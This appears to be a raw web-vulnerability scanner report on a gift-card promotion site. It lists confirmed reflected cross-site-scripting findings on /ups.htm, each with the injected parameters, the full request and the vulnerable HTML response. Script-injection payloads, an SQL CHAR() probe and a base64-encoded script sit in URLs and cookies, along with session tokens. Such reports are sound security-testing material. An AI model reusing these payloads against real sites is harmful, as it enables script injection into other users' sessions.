Cookie: promo_name_cookie=2192name; c_user_pin_id=200492244; c_pin_key=706853; c_email_key=063756462f49f8c46ec5bc4e60bb02b1; gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916164; scook=1303916164; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82e8630bad9rj;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id="><script>netsparker(9)</script>&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=&SID=f05c7ce946bc38d8bfa6b839a4d56265"><script>netsparker(9)</script>&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-int-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=&SID=f05c7ce946bc38d8bfa6b839a4d56265"><script>netsparker(9)</script>&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=&SID=f05c7ce946bc38d8bfa6b839a4d56265"><script>netsparker(9)</script>&promo_name=2192name&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id="><script>netsparker(9)</script>&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift='%2..

Parameters

Parameter Type Value
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET '"--></style></script><script>alert(0x000039)</script>
user_gift_id GET 332549389
path GET p.prize.prepop-reg-int
page_tmp_id GET 9
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_tmp GET 3
ups_ref GET cg
sendroikwd GET 3
raf_ad_id GET 3
remoteRef GET 3_4_0_5068_0
return_url GET 3
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265
page_list GET li_sr_sm

Request

GET /ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000039)%3C/script%3E&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=3&ups_ref=cg&sendroikwd=3&raf_ad_id=3&remoteRef=3_4_0_5068_0&return_url=3&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: promo_name_cookie=2192name; c_user_pin_id=200492244; c_pin_key=706853; c_email_key=063756462f49f8c46ec5bc4e60bb02b1; gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916168; scook=1303916168; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:56:08 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82e88decb3745;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift='"--></style></script><script>netsparker(0x000039)</script>&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000039)</script>&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-int-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000039)</script>&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=296..

Parameters

Parameter Type Value
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET "><script>alert(9)</script>
path GET p.prize.prepop-reg-int
page_tmp_id GET 9
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_tmp GET 3
ups_ref GET cg
sendroikwd GET 3
raf_ad_id GET 3
remoteRef GET 3_4_0_5068_0
return_url GET 3
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265
page_list GET li_sr_sm

Request

GET /ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=%22%3E%3Cscript%3Enetsparker(9)%3C/script%3E&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=3&ups_ref=cg&sendroikwd=3&raf_ad_id=3&remoteRef=3_4_0_5068_0&return_url=3&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: promo_name_cookie=2192name; c_user_pin_id=200492244; c_pin_key=706853; c_email_key=063756462f49f8c46ec5bc4e60bb02b1; gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916180; scook=1303916180; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:56:21 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82e951bd09wq7;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id="><script>netsparker(9)</script>&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $50 Gift Card.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle"> $50 Gift Card</span> <br />
<span style="margin-left: 30px;"><img src="http://www.theuseful.com/media/freegiftcard_reserved_287x180.gif" width="200" height="126"></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $50 Gift Card, start by completing any 6 of the offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=&SID=f05c7ce946bc38d8bfa6b839a4d56265"><script>netsparker(9)</script>&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 6 Offers</span></td><td>
<div id="blue_nextbutton1">
